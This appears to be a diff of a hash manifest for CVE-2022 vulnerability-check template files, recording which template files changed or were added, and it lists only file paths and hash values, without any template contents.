+http/cves/2022/CVE-2022-28032.yaml:708f2f415b34700b0d0c00729c0875db91a2c374 +http/cves/2022/CVE-2022-28079.yaml:fa9dce4e0d421497fb9ff8657f24b9f2b8c25868 http/cves/2022/CVE-2022-28080.yaml:d723a6ba32f55be089ee0eb7c892371246d29e94 -http/cves/2022/CVE-2022-28117.yaml:de5be36c67ec3568946319a9d8fda1fd9a407fc8 -http/cves/2022/CVE-2022-28219.yaml:5484a8cf09f885c2cf07cfce13d0a545d058695a +http/cves/2022/CVE-2022-28117.yaml:cfd8e701f791e5eef6e7db1bcfb97e589bc5a649 +http/cves/2022/CVE-2022-28219.yaml:1d7f97c27e3df92268d195f134f854ab3e86ba07 http/cves/2022/CVE-2022-28290.yaml:76e47a48ebb73d080dd1f86d73b37f222dd76074 http/cves/2022/CVE-2022-28363.yaml:abf570b8ab119e9b8b761dba0fe0112d42f60a9c http/cves/2022/CVE-2022-28365.yaml:2e278c10ba8ab4ae30584dff1b80aff3f295d43c http/cves/2022/CVE-2022-2863.yaml:588007bc6fcd3ba22ae581884f4984ae096df0a1 -http/cves/2022/CVE-2022-28923.yaml:ffb6c6aa0728c841582f7fce8246680f590d4d04 -http/cves/2022/CVE-2022-28955.yaml:96a712d55673b978c1365c2effc3a2a69b063195 -http/cves/2022/CVE-2022-29004.yaml:a689a20b807d3d6393ce80db554b6e8c53582a8b -http/cves/2022/CVE-2022-29005.yaml:fc58484cab10e4de11101552ef5c8cd77aa25216 -http/cves/2022/CVE-2022-29006.yaml:7ab7c5afd43dd8f1d286909f1837f73230e2a7c1 -http/cves/2022/CVE-2022-29007.yaml:0fc8d369269e3eca39aca3a9cdc5ee8308ec994d -http/cves/2022/CVE-2022-29009.yaml:9905f5b4ccb55f4fde86a68d10cb867f85930e6f +http/cves/2022/CVE-2022-28923.yaml:c96228b75c9bacf59e14d079a90428c47e1f6e53 +http/cves/2022/CVE-2022-28955.yaml:f439ef4f0600b6308c9cadafc2d601c88df01b2c +http/cves/2022/CVE-2022-29004.yaml:a3f0a9529fbda162795be9ef6cd1dba303e36c97 +http/cves/2022/CVE-2022-29005.yaml:ec8eb23e2c6233f62566d5a337c9a310253413a4 +http/cves/2022/CVE-2022-29006.yaml:ba51b1d3cbff00b01094b268c4e31858b590664c +http/cves/2022/CVE-2022-29007.yaml:0fe14f657d0adf9382642394f20cb0701ff94438 +http/cves/2022/CVE-2022-29009.yaml:f98649cbe095ba75eae360dc35c6a27facb1345e http/cves/2022/CVE-2022-29014.yaml:ca07b794cfb3f776a5c8acf6b24ad0b831f525fa http/cves/2022/CVE-2022-29078.yaml:2730f1d0cdfe1fe04c64958723a712f905f18e10 -http/cves/2022/CVE-2022-29153.yaml:ee145a7964e5bcbc9d2bfb83ac25e76d920ae4ed +http/cves/2022/CVE-2022-29153.yaml:5c67e6ec67903460ca1f9fb9989d6099c15ab66d http/cves/2022/CVE-2022-29272.yaml:b1c5b5532c3587820d711b0de0ff9e837e0c043c -http/cves/2022/CVE-2022-29298.yaml:293f82848d8dbe58993d3ce91b05fa5918faaae7 +http/cves/2022/CVE-2022-29298.yaml:2948be67e89003ed602dc419efc87cb0a0e61804 http/cves/2022/CVE-2022-29299.yaml:4e06a2ba8ad58138a1def330d23c814fcb6abf63 http/cves/2022/CVE-2022-29301.yaml:a586e8ba95f052009530df4f828295dd6ce9368d -http/cves/2022/CVE-2022-29303.yaml:6d64141c9982ff1a7c80a483614b586bb95ec136 -http/cves/2022/CVE-2022-29349.yaml:076df327764ccb2f95935ed354082ec07a555837 -http/cves/2022/CVE-2022-29383.yaml:e1ac5726305d3140fe59cf7dcfdd9bb8e1729182 -http/cves/2022/CVE-2022-29455.yaml:6904073d5c95d3f5d8eb56b6ed623b31fe18228b +http/cves/2022/CVE-2022-29303.yaml:bc500861623882bf89aad86e803c983e2b402b19 +http/cves/2022/CVE-2022-29349.yaml:faa951ec4976644d9f5af09aab0ce0a188a3421d +http/cves/2022/CVE-2022-29383.yaml:e6f414656f1d2f70bd0c04767a1a0e4682fd5f7d +http/cves/2022/CVE-2022-29455.yaml:3618cc70c1f1e8eda0f7389ece90b0d8a2c86490 http/cves/2022/CVE-2022-29464.yaml:26a2da314404e48617d9c20f1af4b0942403e09b -http/cves/2022/CVE-2022-29548.yaml:5652cc4ee46b83738bdc4f2ec758b1c405bcf837 -http/cves/2022/CVE-2022-29775.yaml:2ed2e21fd6d253213a7e77bc535643c3161e4fb9 -http/cves/2022/CVE-2022-30073.yaml:e8fd8fd6093ee5695a0bfb36469b4d949ac95192 -http/cves/2022/CVE-2022-30489.yaml:6a3a42ecee071f392b1ab0b866ff937989c32e2a -http/cves/2022/CVE-2022-30512.yaml:a02fa380c64431824663c76a6d43e188007ebdf8 +http/cves/2022/CVE-2022-29548.yaml:35239484aa0197c5d154100424541ea7df42a7fb +http/cves/2022/CVE-2022-29775.yaml:0d0ab4d7543514864a9cbc7b6e4d4c0ce3b43fe0 +http/cves/2022/CVE-2022-30073.yaml:166bec883b42db211c935c74f23d05a897dc325c +http/cves/2022/CVE-2022-30489.yaml:f9fe661d49436b9cb4c16fc33c236d489d48e300 +http/cves/2022/CVE-2022-30512.yaml:85c8d7baac86b70145fed95cba5916b12685074b http/cves/2022/CVE-2022-30513.yaml:bf5fda18f1f6efb712b27d25836d05baa1659435 http/cves/2022/CVE-2022-30514.yaml:892dfd1758d854716c7c1ea1a608b3254e843813 http/cves/2022/CVE-2022-30525.yaml:b6a2946f28fc6994dab256714abcc95e54227044 -http/cves/2022/CVE-2022-3062.yaml:e6717d8c36baae322ba8d8fa93501dc46c7630b9 -http/cves/2022/CVE-2022-30776.yaml:912c58ffe355fb213d473e03f5a03eb630630bab -http/cves/2022/CVE-2022-30777.yaml:7d815f28da9fd6fbb6a1bc70aa50a5dd910e382b -http/cves/2022/CVE-2022-31126.yaml:42babaf347e9eb334f8cc213a0a5862964b0ffc4 -http/cves/2022/CVE-2022-31268.yaml:e5b9416b22057fb490dd271de5c0fd0850399b69 -http/cves/2022/CVE-2022-31269.yaml:29d730bf4a8cbcf34231257e367d1f12fa131547 -http/cves/2022/CVE-2022-31299.yaml:53f28cd5a428e5f13c4e794d8dd28bfc7f8b36dd -http/cves/2022/CVE-2022-31373.yaml:3334e892f5f823d5bd0e313cf7ce80620d501e88 +http/cves/2022/CVE-2022-3062.yaml:68d858c160cbc0a402fff1d022a918d21568e96b +http/cves/2022/CVE-2022-30776.yaml:a78255c8ebf2cf663bdf97bbf8c7815d024adb33 +http/cves/2022/CVE-2022-30777.yaml:ec1a8e575a43843676efb478c7e211151dafec09 +http/cves/2022/CVE-2022-31126.yaml:3fe8cfa7c4a2be80a6ac8a7ea331390f8339ce96 +http/cves/2022/CVE-2022-31268.yaml:cd161765868e78795bcd0a92497171c4e5ab5514 +http/cves/2022/CVE-2022-31269.yaml:d603edd56d8e2ff722921f903c6b2fc85d62040e +http/cves/2022/CVE-2022-31299.yaml:9126fce245298cc5070b0e3febd88c18854bda6e +http/cves/2022/CVE-2022-31373.yaml:92694aea6b5481280c53fb2df03ac2617ae14aad http/cves/2022/CVE-2022-31474.yaml:0c45bddb698ff0130b7a63a8c499b5be2da6d2e4 -http/cves/2022/CVE-2022-31499.yaml:6752b40541eeb1811f979f752f49b7a161b31601 -http/cves/2022/CVE-2022-31656.yaml:dc4f31e907babce4a5e6d53576dd5b5940136a06 -http/cves/2022/CVE-2022-31798.yaml:9eeff07d838fe156354fbb06b63b80ec579bcade -http/cves/2022/CVE-2022-31814.yaml:618cabd26496c23742cc28295ac421646ffba3b3 -http/cves/2022/CVE-2022-31845.yaml:d14e32506354874954980ac12c82d3a89e33419a -http/cves/2022/CVE-2022-31846.yaml:227193435de2a3b738d5ff0678a00156640b8f3a -http/cves/2022/CVE-2022-31847.yaml:366e8f4b93973a249b7adde9c7fc3dde4c2696da -http/cves/2022/CVE-2022-31854.yaml:a5f38dd2a819113600fad3892d39ca1f9b36ae76 -http/cves/2022/CVE-2022-32007.yaml:e8507c14ccc20b645ef2363c053ffca2db31c223 -http/cves/2022/CVE-2022-32015.yaml:a3ced09f4ab600a5223dabead73b5d15f7286ba4 -http/cves/2022/CVE-2022-32018.yaml:12aace4ddaa65ee8ad82489eea96e7768d96c10d -http/cves/2022/CVE-2022-32022.yaml:e0195c949752062dcc36c58048eb90423d7cd3ff -http/cves/2022/CVE-2022-32024.yaml:67b99c0a415f9925da7ee6f8dae3fe78131b3529 -http/cves/2022/CVE-2022-32025.yaml:842b73df57ea4af6837af1a1e3fbad81f416f352 -http/cves/2022/CVE-2022-32026.yaml:8b4aaa178aec6865c41e26e08c0890a2922bfa61 -http/cves/2022/CVE-2022-32028.yaml:356a4f3c0d8979b3ce84c8849e323f34a3e2a4f4 -http/cves/2022/CVE-2022-32094.yaml:1d987744576e39fee326d6c844ad7267a1a19191 -http/cves/2022/CVE-2022-32195.yaml:1f0be175e907138d61deddb823eede51d4749962 -http/cves/2022/CVE-2022-32409.yaml:5523901f96bb7dd7f6d48f131506bd839ca6aa7e -http/cves/2022/CVE-2022-32429.yaml:016d7caa2c8a455ad3a7b5aa5a74a70f26b50e20 +http/cves/2022/CVE-2022-31499.yaml:97aecb8eaf53137a2b6647038491dcf94d884126 +http/cves/2022/CVE-2022-31656.yaml:20420155391773c9607f9da1395fd70f53918440 +http/cves/2022/CVE-2022-31798.yaml:2f9627e1de789043ca1a2b20dd1c02aa49c27e67 +http/cves/2022/CVE-2022-31814.yaml:00defbcae2429af9d31e827bcbaf8ab69099ad7f +http/cves/2022/CVE-2022-31845.yaml:9278e256086a474d9d9d699d29675486a97bde7a +http/cves/2022/CVE-2022-31846.yaml:c60ed6dff4441dd42a659d3614b682525e11de10 +http/cves/2022/CVE-2022-31847.yaml:9af65bcada07c54de2b883b8704b59a8353f59e2 +http/cves/2022/CVE-2022-31854.yaml:79d72e3d85c883b2c6c378b47a1623f9adbe1fd3 +http/cves/2022/CVE-2022-31879.yaml:f8cf5d4a29565ce4463f1a516fd8fac9a5836e35 +http/cves/2022/CVE-2022-31974.yaml:4743043d1275bd1e3a470b861d5c6cf64cce8b2e +http/cves/2022/CVE-2022-31975.yaml:d824e2af3c15f7fb23b589970db959d0c30b69c1 +http/cves/2022/CVE-2022-31976.yaml:e884f9f9980eb80fd51a881105586ec7cd9b6203 +http/cves/2022/CVE-2022-31977.yaml:b47c68fbfe45c9e526909e223ca76bd2bd9efafe +http/cves/2022/CVE-2022-31978.yaml:c95d33fae52cbdca6cdf0d01add3ad28d9f7760a +http/cves/2022/CVE-2022-31980.yaml:aa1b39a15d59e7d6418428c804c9bfeaa3652332 +http/cves/2022/CVE-2022-31981.yaml:84129b846befc14456516d0a596fca861099a710 +http/cves/2022/CVE-2022-31982.yaml:6f7ced4cfb3bb07daf3d6670a7f7d5f704397e89 +http/cves/2022/CVE-2022-31983.yaml:ec226bf41d59c20682af49f73f12e92c70c3a126 +http/cves/2022/CVE-2022-31984.yaml:70be208e6c5b7dbc221722ff71c7e63f77defcf5 +http/cves/2022/CVE-2022-32007.yaml:ac2a60c71b48bb702dd8bd9fca8fc48d4e155f81 +http/cves/2022/CVE-2022-32015.yaml:30b3101b1f227b1808297b56ad7c08d6c2ab64b6 +http/cves/2022/CVE-2022-32018.yaml:ffd0056647ef05a91a79e0f7c6cc31c49584c23f +http/cves/2022/CVE-2022-32022.yaml:df3b12cfd46fde43c4b4bd351d5ed00d2e17b5e2 +http/cves/2022/CVE-2022-32024.yaml:b71dec4417f7004f78127ff61314b0956db4346b +http/cves/2022/CVE-2022-32025.yaml:b926083972528e69ba2d9b148216a36e9e5ba576 +http/cves/2022/CVE-2022-32026.yaml:69c62fe2a497762a8ed38499477d1b05598907ce +http/cves/2022/CVE-2022-32028.yaml:3d1d4ee7565b50f21f44028ade8a1e7ebf2c580f +http/cves/2022/CVE-2022-32094.yaml:2771cc3130135930c6882f2b692139cef59ceba7 +http/cves/2022/CVE-2022-32195.yaml:0768c0d476cc98f8f76df0b62820afe2419554ac +http/cves/2022/CVE-2022-32409.yaml:9e5161a4c62182d1aea71b6b08204726f69fd743 +http/cves/2022/CVE-2022-32429.yaml:bbf69cee72c7797514a28b1a07f8d264a232fe06 http/cves/2022/CVE-2022-32444.yaml:d2347fc7d7be61803c27fc43cbcdaabb3dc89e88 -http/cves/2022/CVE-2022-32770.yaml:608813d57b090b7744e33e250b17cd08597a9d2a -http/cves/2022/CVE-2022-32771.yaml:0e63eb5a85e6e626dd34a74a6ce310d737520811 -http/cves/2022/CVE-2022-32772.yaml:7737bed94a3331e0a1a2b71389cba9cdf658cc7b -http/cves/2022/CVE-2022-33119.yaml:821cb950914975bb93b1217702bffc1a0fc63f1c -http/cves/2022/CVE-2022-33174.yaml:810775e3582d639315d360c4ca6e8035ea85bec9 -http/cves/2022/CVE-2022-33891.yaml:cd2dcb8a846bfb1d3929b7acb869404178d701c2 -http/cves/2022/CVE-2022-33901.yaml:d80a72e9920b66b0a17848b41bb817e36748c017 -http/cves/2022/CVE-2022-33965.yaml:77f7cf322fa8e4eb99d21305ba081ded291a50d5 -http/cves/2022/CVE-2022-34045.yaml:b96ced4b717d855d289f84cc79cf61185de42835 -http/cves/2022/CVE-2022-34046.yaml:9d493b0b4cf8f25742119128cd5d5f0c05864936 -http/cves/2022/CVE-2022-34047.yaml:31f4df927017c7aabea40fc3dd37946cc242b917 -http/cves/2022/CVE-2022-34048.yaml:e1bf3c752f75d38a599cc0ecc0a05dc33a447017 -http/cves/2022/CVE-2022-34049.yaml:2ab4d8e7e5a818ace9dda1a8372f3d7044b823f4 -http/cves/2022/CVE-2022-34121.yaml:8501403f51c5897d9d56f535da1173ffa59d64ea -http/cves/2022/CVE-2022-34328.yaml:c7304744f7afe65b14c04f32ba2ac678839015b2 -http/cves/2022/CVE-2022-34576.yaml:5d9b8804cc9678897c8fa263f8660a9eb92c94da -http/cves/2022/CVE-2022-34590.yaml:e79006c5d2bd5f7358a9c5644df86b63bd82bef5 +http/cves/2022/CVE-2022-32770.yaml:655e8224cda33b49ad70bdd75e16834178aa34d3 +http/cves/2022/CVE-2022-32771.yaml:0b9a6892c94e172f73595400f6078f65f9b0aff6 +http/cves/2022/CVE-2022-32772.yaml:54d79fdb9a253b83793f8c118704da2639cb5a60 +http/cves/2022/CVE-2022-33119.yaml:42b8931b8feb06d7b5df350174393bbba67af27e +http/cves/2022/CVE-2022-33174.yaml:8500bc8e1b46d9e60d4f346f006ebc0616262db1 +http/cves/2022/CVE-2022-33891.yaml:45315f3f933f036eeff7ad7dac511d5473809714 +http/cves/2022/CVE-2022-33901.yaml:e55e974ef5c57da3cdda19029be8db100c2931e2 +http/cves/2022/CVE-2022-33965.yaml:218d51db4db1a0aaa35e9ba7cd896d2391031c6a +http/cves/2022/CVE-2022-34045.yaml:812f54c1718ee17c4e38ddd56af62ceb6c168c17 +http/cves/2022/CVE-2022-34046.yaml:cfb3b93a28d8951db7001e48fc9a3f9ccbd62e66 +http/cves/2022/CVE-2022-34047.yaml:d1dd7ec59f51b7381282b4bb51dc23ade9be6e3b +http/cves/2022/CVE-2022-34048.yaml:0510a971f1efe32f07d5b123eae9d09806e2389f +http/cves/2022/CVE-2022-34049.yaml:7bd24a2bcd26a8c53915155dfc887bbffc3ca0fb +http/cves/2022/CVE-2022-34121.yaml:64ec232281ac09e037db0ee8c3e2ea3305692449 +http/cves/2022/CVE-2022-34328.yaml:2c4d71de98f9ff09ab762b31b5c970dabacc81bf +http/cves/2022/CVE-2022-34576.yaml:dae9bfbf5e57e75eb8d0897ed7bdad63227174dd +http/cves/2022/CVE-2022-34590.yaml:06ee7d09b993dd6c637dc5ac9aaecc1261fa1b41 http/cves/2022/CVE-2022-34753.yaml:92f76f9bcdc43baee8494459a0260da840b64e5a http/cves/2022/CVE-2022-3484.yaml:e875835be6a127b65d965de09ad877f474b14119 -http/cves/2022/CVE-2022-3506.yaml:23fc455f32e92be7d143c512a6a2e23f822c8fa8 -http/cves/2022/CVE-2022-35151.yaml:bbe1b227a06524d6714d3cfb3197bb51875a3b5b +http/cves/2022/CVE-2022-3506.yaml:a1ea33d0f67db2dcbe88082cbb15a5749e609f4b +http/cves/2022/CVE-2022-35151.yaml:c0776a0afb8ca4469508dae79dc67197d0d76ed8 http/cves/2022/CVE-2022-35405.yaml:7af2589dcf827962fb92f420f82c02071c7c6c13 -http/cves/2022/CVE-2022-35413.yaml:147d9a62e6a0fea033d8936542f818f3c376ce7d -http/cves/2022/CVE-2022-35416.yaml:e8c4b108b5402932e888b31cd614677f7e96779a -http/cves/2022/CVE-2022-35493.yaml:c2c92ab1e4fd5d254f89a01da4403159ce2928e9 -http/cves/2022/CVE-2022-3578.yaml:1866270181cf1d29f2f4ecdab6c61dc652a47cb4 -http/cves/2022/CVE-2022-35914.yaml:701ffbb92d9a3d568d431a008b05b267e3eac1bb +http/cves/2022/CVE-2022-35413.yaml:389e328e2fa1529d523764060da0b96d071fe4b7 +http/cves/2022/CVE-2022-35416.yaml:68e74086a61984ecc5244aa94e83543ae6850f62 +http/cves/2022/CVE-2022-35493.yaml:d24b8be7b1c43c874aee1c96adb259d5eb5da8f4 +http/cves/2022/CVE-2022-3578.yaml:525d05b787994c2bc32e907c56187e01e155be2a +http/cves/2022/CVE-2022-35914.yaml:c2e11850f87f5d70d871c551a008012f30ff1559 http/cves/2022/CVE-2022-36446.yaml:c54380a665d59e3234165cdf17cf9001f5463666 -http/cves/2022/CVE-2022-36537.yaml:351d3d3413d9c40b655d5fa950f3972d448296f5 -http/cves/2022/CVE-2022-36642.yaml:85d37625adef82d343cf4869cb0f6079059d73ef +http/cves/2022/CVE-2022-36537.yaml:519cb97f12e778b8c2c55fd360c1d59856aa3c66 +http/cves/2022/CVE-2022-36642.yaml:a9e4ad215550d6fa36a06c6a713a955779bbf342 http/cves/2022/CVE-2022-36804.yaml:9d34af98b034547f68c6de43401f4c52fd3e0110 -http/cves/2022/CVE-2022-36883.yaml:3c9907a9d605f11f39e4f3f813ade99e3581d68c +http/cves/2022/CVE-2022-36883.yaml:7df34a627f9dee3c2a81adccd77a49fed31971d4 http/cves/2022/CVE-2022-37042.yaml:8b2822ec06d4ac35cf69238de93928beed73d052 -http/cves/2022/CVE-2022-37153.yaml:7ea7043ecc8161fb341cfd0d8c911b8856464f54 -http/cves/2022/CVE-2022-37190.yaml:9f17ec01eb1e21e7477626e425e31afc82e4880e -http/cves/2022/CVE-2022-37191.yaml:a19d368dd927f1f6dd9b3bc04c76c4a9d8fe2e24 -http/cves/2022/CVE-2022-37299.yaml:830748158d4dc7eafc1175031712fadc896ca1ac -http/cves/2022/CVE-2022-3768.yaml:7430b66bd602a5d4ecb0c8050c2ac812205edcb9 +http/cves/2022/CVE-2022-37153.yaml:763f043b671e1c0d72ea5c27088cc4ec7273b05d +http/cves/2022/CVE-2022-37190.yaml:13f4990752d38a2a540cbf1b121265b2ba8b9554 +http/cves/2022/CVE-2022-37191.yaml:e3ee35667851438c17ea6ee702b59a9e15355689 +http/cves/2022/CVE-2022-37299.yaml:6dd40266e022456c9dac486f66689ea9987eb0bb +http/cves/2022/CVE-2022-3768.yaml:5106c8cbc7242c367bb1c8a23e1d23ea44fed666 http/cves/2022/CVE-2022-3800.yaml:ad5c254825b1a851bb7d4c78365abdbbacacadf1 -http/cves/2022/CVE-2022-38295.yaml:6ceb1791ab51e6273a2bd98e44d41fd7093a6504 -http/cves/2022/CVE-2022-38296.yaml:8f9962e7342f635b3761cfa94bf99c54d5025227 -http/cves/2022/CVE-2022-38463.yaml:ca5cc3e5b3d7f9134766fb127f78bbe200ff4ef3 -http/cves/2022/CVE-2022-38467.yaml:2443292b87d0b525d53a60043f49203d6fa8c105 -http/cves/2022/CVE-2022-38553.yaml:d7082ae23dcb23bada96ab1e889d2c7defe54cb7 -http/cves/2022/CVE-2022-38637.yaml:9293cf743fb00e6f4fa0abd96292b5e21f5bc034 +http/cves/2022/CVE-2022-38295.yaml:f562092ae59f29acfaffc8d03f0e6e2eb1b276bd +http/cves/2022/CVE-2022-38296.yaml:1af75672f73e1357588a56ec55d260d7814d0da4 +http/cves/2022/CVE-2022-38463.yaml:b97d4ad0b426976c9b8f46ef7285617711912d66 +http/cves/2022/CVE-2022-38467.yaml:d89ea81f79db2e79bb35a798b59e9efda10a436f +http/cves/2022/CVE-2022-38553.yaml:2e478d3a30aea83ce732c4e065a4d06a4a24977e +http/cves/2022/CVE-2022-38637.yaml:ed8155457f5a787da14cd2c8a652ad77909893bd http/cves/2022/CVE-2022-38794.yaml:6dedafe165ab6c98deb16b14a00a051eedb95a62 http/cves/2022/CVE-2022-38817.yaml:a17e4b5f09ee588f20f5ed06176ce64b0afd6457 http/cves/2022/CVE-2022-38870.yaml:29f8499998250527d430ced80074fc0ec6b77690 -http/cves/2022/CVE-2022-3908.yaml:5d123b77a437a8123472948ea8d38910d3c3c45c -http/cves/2022/CVE-2022-39195.yaml:d9c5009e1db4d37875a93a1e07822e930946aabe -http/cves/2022/CVE-2022-3933.yaml:2a93c81c4f3bddb26bdbcada91eedc557de303b9 -http/cves/2022/CVE-2022-3934.yaml:01ce04a35d7e246e49c670ad1535b370f92da281 -http/cves/2022/CVE-2022-3980.yaml:d649d679201bde5f527a4c3e0f74d77257b68952 -http/cves/2022/CVE-2022-3982.yaml:4cf646b7594ec2b07dd1369c5cb1146531200144 -http/cves/2022/CVE-2022-39952.yaml:d24450ce28a9ba322b863d431babadc812d4cd39 -http/cves/2022/CVE-2022-39960.yaml:942b751c80ffb578f36fa28d0880f21988a10e19 +http/cves/2022/CVE-2022-3908.yaml:2b35214cc4d5ef260aee2c7173b22ea19faa05a2 +http/cves/2022/CVE-2022-39195.yaml:afe6f540e290fb54587147975cee55b4563e4255 +http/cves/2022/CVE-2022-3933.yaml:fa4c4d682c5b51f60d724e393f7b0b089c958b62 +http/cves/2022/CVE-2022-3934.yaml:b12888b8a1169f9caefe4214c8f45bd674e8210c +http/cves/2022/CVE-2022-3980.yaml:46865753312025256c7d9994bf535bec98f1d63f +http/cves/2022/CVE-2022-3982.yaml:995b0a9d052bec87678838c1acb3f0e2f4454e41 +http/cves/2022/CVE-2022-39952.yaml:a72f183386bfaf28386edfc1bf8fc942fdc1ca23 +http/cves/2022/CVE-2022-39960.yaml:4056835c7dcb8d36981308a2473aa7e5a56564a1 +http/cves/2022/CVE-2022-40022.yaml:968f886d14011acefd840d1750585b527ad00333 http/cves/2022/CVE-2022-40083.yaml:9ba7fc77af19ea9fd4c26fdba205dfe35dff0010 -http/cves/2022/CVE-2022-40359.yaml:6f38cc8c5ef0612cf7b375998e62c8682f78ec47 -http/cves/2022/CVE-2022-4050.yaml:e125ba1b99aef28445ba1ebeb59df9e4861e52df -http/cves/2022/CVE-2022-4060.yaml:906a65c39d168147b3b6cf06bbbbbf70e5a0b383 -http/cves/2022/CVE-2022-4063.yaml:8676f0d0fd8aa424ff1a1724ffac4d188179cc07 +http/cves/2022/CVE-2022-40359.yaml:585ea7fc6f6e4c36cd21cbd769bc5baf762b57fb +http/cves/2022/CVE-2022-4050.yaml:473f4be072cbe3ee2cabe9f429220c526f681bf1 +http/cves/2022/CVE-2022-4060.yaml:e9484532c54974eae706dacdaf1e80b9519d6ca9 +http/cves/2022/CVE-2022-4063.yaml:1cdf397bb85fe95ce76986770a11f50f0149781f http/cves/2022/CVE-2022-40684.yaml:2cf6ab3deba9700e39a8c97ae7297fde29b5a2f6 -http/cves/2022/CVE-2022-40734.yaml:7bfb2844255d77f20c08298c1dad6b890b120ce1 +http/cves/2022/CVE-2022-40734.yaml:eb58987ff3bd2091c940bc12896b06f591447aaa http/cves/2022/CVE-2022-40879.yaml:fd4271080a9753201d31f56be9b93f36ca9d09e2 -http/cves/2022/CVE-2022-40881.yaml:19f3b9e38c1a7ddae0392b1b34c3342fdab02ff4 -http/cves/2022/CVE-2022-4117.yaml:47f00b5189ecec6522c513454e9365a0fcfb7dc0 -http/cves/2022/CVE-2022-4140.yaml:8d71290e8758b926eae3b87bbbf677a9274f577c -http/cves/2022/CVE-2022-41441.yaml:14c55ff38394d37b468ffd2bae1e86e9148d9b4b -http/cves/2022/CVE-2022-41473.yaml:ce023559c56d1a6f4f45484b3221300df704011a -http/cves/2022/CVE-2022-41840.yaml:ef9a8acd64f558eebced18e2c4ac9813a0fbc202 -http/cves/2022/CVE-2022-42094.yaml:8998f04a44f0902657500bacd4dd10e3b327a184 -http/cves/2022/CVE-2022-42095.yaml:39bc05a39c6029f9b30830a0c80b9f610ae52fa4 -http/cves/2022/CVE-2022-42096.yaml:99f67babd0c09aaa7b0d2ba5a0e1fafea9560422 -http/cves/2022/CVE-2022-42233.yaml:024ea8f06aec3b5173e1210883094acc44a630fa -http/cves/2022/CVE-2022-4260.yaml:4a4d21fda9c5c9a6c6df4f47213331cffae87eb7 -http/cves/2022/CVE-2022-42746.yaml:56f224ce6f319619f0009050f404e45ebb849de8 -http/cves/2022/CVE-2022-42747.yaml:3cd9ad44639adaf4bc71d20ec386e973493e7173 -http/cves/2022/CVE-2022-42748.yaml:e2e1f94b7aee28f6b4541a389eaf18e8e785f306 -http/cves/2022/CVE-2022-42749.yaml:038d08e2732e4a0be16f548f25a9bc2054e2da11 -http/cves/2022/CVE-2022-4301.yaml:9601625b0e0df34b40aa3e7c0ecd8a6ddb332ecf -http/cves/2022/CVE-2022-43014.yaml:253066a8ef87bbee14047a2d65f8308e0ee641fa -http/cves/2022/CVE-2022-43015.yaml:d5a10b70f7cbbbaa6c2b61aa2141df874ab4c7fc -http/cves/2022/CVE-2022-43016.yaml:952f1ed177f7a54b2c3c3e45d39dbfdddda8d96f -http/cves/2022/CVE-2022-43017.yaml:b32b357f506f99863ae7e3c65726ada4208a83b0 -http/cves/2022/CVE-2022-43018.yaml:6efd52500ada5a0782737ab59ea723045c5fbe8d -http/cves/2022/CVE-2022-4306.yaml:02a903b4acc2888924a5d36cacb3b1b2d6c92c58 -http/cves/2022/CVE-2022-43140.yaml:4f189a41246de8e31e68b6ef0a4e8739f8620e49 -http/cves/2022/CVE-2022-4320.yaml:17a281aa70d9bf555212c183da6740ff0ba08157 -http/cves/2022/CVE-2022-4321.yaml:38f1307cd94c1433b6e7725ffc9e5956879efa94 -http/cves/2022/CVE-2022-4325.yaml:8c253026191883180a4f50e6a1b361877c4b788a -http/cves/2022/CVE-2022-4328.yaml:a7f9ea10aa04614ddb1d59a09ff8810690dfe2c9 -http/cves/2022/CVE-2022-43769.yaml:3e0f98107a1b4b5cbc34ebbd63fcb77930b34207 -http/cves/2022/CVE-2022-4447.yaml:cff44ffea02ef44e6477ce433ad9f21c14ebd86b -http/cves/2022/CVE-2022-44877.yaml:39c80959aee3fc4c469abb564860e177b2246561 -http/cves/2022/CVE-2022-45037.yaml:dd2679516d7e0812cee140803ed4a17d34723593 -http/cves/2022/CVE-2022-45038.yaml:3891bd1f10ca930654dcfa2e282d91fd2804ad16 +http/cves/2022/CVE-2022-40881.yaml:f9691882ec920da5e8f0d450d7cdb4c0b73f10cb +http/cves/2022/CVE-2022-4117.yaml:b7dca86c02204d876fc3e8b0b027d1df52fbcc34 +http/cves/2022/CVE-2022-4140.yaml:b78911abd87bf67fc39871186ccfb2b98272edea +http/cves/2022/CVE-2022-41441.yaml:e4cb3029c4111fd270c83e36cb8da3df097bcbb4 +http/cves/2022/CVE-2022-41473.yaml:b2878e212ecc56ac7508e2aa08ee19ee89558cc1 +http/cves/2022/CVE-2022-41840.yaml:243dd9a273d92ac6d26bd492cc9ca17dfe7cc818 +http/cves/2022/CVE-2022-42094.yaml:66b29bbab2a7d70c64207595cfb0e8b9c9b12820 +http/cves/2022/CVE-2022-42095.yaml:5dcc9884a5a4dc25b2c6d3e783fbe9b29bcf5145 +http/cves/2022/CVE-2022-42096.yaml:f0380b23a0a70b99138efabc9bc0f6e082711b8b +http/cves/2022/CVE-2022-42233.yaml:ee355afbe4227b4c48f8d758231374f7ef2ed795 +http/cves/2022/CVE-2022-4260.yaml:24ec14453b81ca3cdd56f3d2996178365c044327 +http/cves/2022/CVE-2022-42746.yaml:c64c826d3fe4b719ebb1ca6b5e36a7e787c0f30e +http/cves/2022/CVE-2022-42747.yaml:d6941a00d6b78b91798384960bc8ed30a8672d49 +http/cves/2022/CVE-2022-42748.yaml:71fadb44b22cc1f9f3c13c93c74c39da31c269bf +http/cves/2022/CVE-2022-42749.yaml:a26e8203fe0416ca1bbc8ae8522c05005857361f +http/cves/2022/CVE-2022-4301.yaml:ccf5f2281f3b8904a23446cf026da065ced35d02 +http/cves/2022/CVE-2022-43014.yaml:96115507ed4cfc2a740caeed1fc686584af75779 +http/cves/2022/CVE-2022-43015.yaml:7208520cb12217d1afa034dfc32fccd25b6a419a +http/cves/2022/CVE-2022-43016.yaml:56e696649df3d8b79c8025905f681083f2da13f7 +http/cves/2022/CVE-2022-43017.yaml:d06c1e080bfe531480b9ce4564878170064471f4 +http/cves/2022/CVE-2022-43018.yaml:b67c145f807e1b5d9eac3444ee19e21eeb71dbfb +http/cves/2022/CVE-2022-4306.yaml:baf4b74e105b23b4285e71fe8168ccd0cecf2694 +http/cves/2022/CVE-2022-43140.yaml:94e12dcac0d48b4382cc5b502320602d206dd5e4 +http/cves/2022/CVE-2022-4320.yaml:a4d07e422ca4170711917f56e18dc60c69d09477 +http/cves/2022/CVE-2022-4321.yaml:2c946ca96446b21fdda3fe54f8b5c330ba64c7c0 +http/cves/2022/CVE-2022-4325.yaml:72f95840a7969d3ae60861ac768bb8fcc0e9d7de +http/cves/2022/CVE-2022-4328.yaml:5a9beeb454fc94c94af5e56ede3e4d7d9780cc2a +http/cves/2022/CVE-2022-43769.yaml:dfdafa502f74b2ca3cbead39ba7248d2c9479790 